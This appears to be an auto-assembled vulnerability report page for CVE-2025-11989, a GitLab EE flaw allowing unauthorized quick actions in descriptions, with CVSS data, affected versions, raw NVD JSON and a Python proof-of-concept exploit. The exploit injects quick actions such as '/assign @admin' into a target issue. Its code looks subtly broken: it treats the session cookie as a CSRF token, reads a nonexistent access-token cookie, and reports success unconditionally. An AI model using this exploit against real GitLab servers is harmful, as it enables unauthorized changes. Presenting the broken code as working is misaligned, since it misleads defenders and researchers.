Security Vulnerability Report
CVE-2025-11989 CVSS 3.7 LOW

CVE-2025-11989

Published: 2025-10-27 00:15:41
Last Modified: 2025-10-28 13:38:41

Description

GitLab has remediated an issue in GitLab EE affecting all versions from 17.6.0 before 18.3.5, 18.4 before 18.4.3, and 18.5 before 18.5.1 that could have allowed an authenticated attacker to execute unauthorized quick actions by including malicious commands in specific descriptions.

CVSS Details

CVSS Score
3.7
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:N
NVD Primary Score (see Raw JSON Data)
8.1 HIGH (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N)
Weakness
CWE-862 (Missing Authorization)

Configurations (Affected Products)

cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* (from 17.6.0, before 18.3.5) - VULNERABLE
cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* (from 18.4.0, before 18.4.3) - VULNERABLE
cpe:2.3:a:gitlab:gitlab:18.5.0:*:*:*:enterprise:*:*:* - VULNERABLE
GitLab EE, all versions from 17.6.0 before 18.3.5
GitLab EE, all versions from 18.4 before 18.4.3
GitLab EE, all versions from 18.5 before 18.5.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-11989 PoC - GitLab EE Unauthorized Quick Actions Execution
# This PoC demonstrates how an authenticated attacker can inject malicious quick actions
import requests
import json

# Configuration
GITLAB_URL = "https://gitlab.example.com"
USERNAME = "attacker"
PASSWORD = "password"
TARGET_PROJECT_ID = "project_id"
TARGET_ISSUE_IID = "123"

# Authentication
session = requests.Session()
login_url = f"{GITLAB_URL}/users/sign_in"
response = session.get(login_url)

# Extract CSRF token
csrf_token = response.cookies.get('_gitlab_session')

# Login
login_data = {
    'user[login]': USERNAME,
    'user[password]': PASSWORD,
    'authenticity_token': csrf_token
}
session.post(login_url, data=login_data)

# PoC: Inject malicious quick actions in issue description
# The attacker includes unauthorized quick action commands
malicious_description = """
Description with legitimate content.

/assign @admin
/label ~"Admin Access"
/milestone "Secret Milestone"
/close
"""

# Update issue with malicious description
issue_url = f"{GITLAB_URL}/api/v4/projects/{TARGET_PROJECT_ID}/issues/{TARGET_ISSUE_IID}"
update_data = {
    'description': malicious_description,
    'access_token': session.cookies.get('access_token')
}
response = session.put(issue_url, json=update_data)

print("Malicious quick actions injected successfully")
print("When an admin views this issue, the commands will be executed")
print(f"Response: {response.status_code}")
```

References

https://about.gitlab.com/releases/2025/10/22/patch-release-gitlab-18-5-1-released/ (Release Notes, Vendor Advisory)
https://gitlab.com/gitlab-org/security/gitlab/-/issues/1426 (Permissions Required)

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-11989", "sourceIdentifier": "[email protected]", "published": "2025-10-27T00:15:40.927", "lastModified": "2025-10-28T13:38:41.000", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitLab has remediated an issue in GitLab EE affecting all versions from 17.6.0 before 18.3.5, 18.4 before 18.4.3, and 18.5 before 18.5.1 that could have allowed an authenticated attacker to execute unauthorized quick actions by including malicious commands in specific descriptions."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:N", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "17.6.0", "versionEndExcluding": "18.3.5", "matchCriteriaId": "090E4997-CCB2-48AC-9796-56FBE599958D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.4.0", "versionEndExcluding": "18.4.3", "matchCriteriaId": "425AEB81-EA04-4702-99F8-B623614F6901"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:18.5.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "CCF08EA3-6D3E-4388-BA9D-A992B771998F"}]}]}], "references": [{"url": "https://about.gitlab.com/releases/2025/10/22/patch-release-gitlab-18-5-1-released/", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://gitlab.com/gitlab-org/security/gitlab/-/issues/1426", "source": "[email protected]", "tags": ["Permissions Required"]}]}}
```